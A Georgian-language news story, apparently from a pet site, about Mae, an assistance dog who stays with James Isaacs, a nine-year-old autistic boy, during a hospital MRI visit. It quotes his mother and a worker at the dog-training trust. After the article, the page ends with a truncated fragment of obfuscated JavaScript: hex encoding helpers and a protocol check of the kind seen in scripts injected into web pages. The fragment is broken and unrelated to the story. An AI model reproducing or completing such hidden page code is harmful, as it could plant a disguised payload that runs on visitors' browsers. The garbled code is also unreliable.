ძაღლი თავის პატარა მეგობარს საავადმყოფოში მარტოს არ ტოვებს
ძაღლი თავის პატარა მეგობარს საავადმყოფოში მარტოს არ ტოვებს
9 წლის ჯეიმს აიზეკისთვის სამყარო ზოგჯერ შეუცნობი და საშიშია. როგორც ყველა აუტისტი ბავშვი, ჯეიმსი არ ლაპარაკობს და თავს უხერხულად გრძნობს, თუ ვინმე ეხება.

საბედნიეროდ, ჯეიმსს ჰყავს მაე - ერთგული ძაღლი, რომელიც არასოდეს ტოვებს მარტო.

Zooclub

ცოტა ხნის წინ ბავშვი კლინიკაში MRI-ს დიაგნოსტიკისთვის მივიდა. მაეს მასთან ერთად წასვლის უფლება მისცეს. მეტიც, ის საავადმყოფოს საწოლზე ჯეიმსთან ერთად იწვა.

Zooclub

პროცედურების გავლის დროს მაე მასთან ერთად იყო.

“ის უყურებდა ჯეიმსს და ნამდვილად ღელავდა მასზე”, - ამბობს ჯეიმსის დედა მიშელ აიზეკი.

Zooclub

ნამდვილად, მაეს დახმარება საავადმყოფოში ვიზიტის დროს
შეუფასებელი იყო, მაგრამ მიშელი ამბობს, რომ ძაღლი ჯეიმსის საუკეთესო მეგობარია და იგი უზომოდ მნიშნელოვანია მისთვის
ნებისმიერ სხვა დღეს (მასე შემდეგ, რაც მაე მათ ოჯახში გაჩნდა, ანუ ორნახევარი წლის წინ).

Zooclub

გარდა იმისა, რომ მაე არ აძლევს საშუალებას ჯეიმსს დაიკარგოს, ან ნებისმიერ სხვა უსიამოვნებაში მოხვდეს, ძაღლი, რომელიც Assistance Dogs New Zealand Trust-შია გაწვრთნილი, საზოგადოებაში ყოფნის დროს, ბავშვს ამშვიდებს, რომ არ იღელვოს და არ შეშინდეს.

Zooclub

“ნამდვილი საოცრებაა ის, რაც აუტისტ ბავშვებსა და ძაღლებს შორის ხდება - ისინი ადვილად ამშვიდებენ ბავშვებს, - ამბობს ორგანიზაციის თანამშრომელი ვენდი ისაასკი, - ბავშვები ძაღლებთან უფრო ხშირად ამყარებენ მხედველობით კონტაქტს, ვიდრე მშობლებთან, ან და-ძმასთან”.

Zooclub



// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e